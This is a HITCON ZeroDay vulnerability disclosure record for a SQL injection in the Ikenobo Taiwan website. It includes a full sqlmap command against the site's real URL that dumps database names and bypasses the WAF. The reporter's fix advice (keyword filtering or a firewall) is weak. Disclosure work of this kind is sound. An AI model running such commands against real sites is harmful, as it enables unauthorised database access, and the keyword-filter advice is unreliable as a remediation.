Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00536
- Vendor: 華道家元池坊
- Title: 華道家元池坊官網SQL injection漏洞
- Introduction: 攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
處理狀態
目前狀態
公開
Last Update : 2023/12/01
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/10/01 08:18:00 : 新提交 (由 shnien 更新此狀態)
- 2023/10/01 10:26:53 : 新提交 (由 shnien 更新此狀態)
- 2023/10/02 17:54:45 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/10/13 16:44:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/10/13 16:44:20 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/10/25 16:50:58 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/12/01 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00536
- 通報者:s52492001 (shnien)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.ikenobo-official.tw/index.php?action=classroom&fid=34&cid=118
敘述
以sqlmap輔助測試,payload為: sqlmap -u 'http://www.ikenobo-official.tw/index.php?action=classroom&fid=34&cid=118' --batch --random-agent --dbs -
-skip-waf
發現GET參數「CID」存在SQL injection弱點
可獲取後台資料庫
以及其tables
若再進一步挖下去甚至可以挖出系統管理者帳號密碼
這邊就不繼續了
修補建議
濾除SQL語法關鍵字
或乾脆簡單點掛個防火牆
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。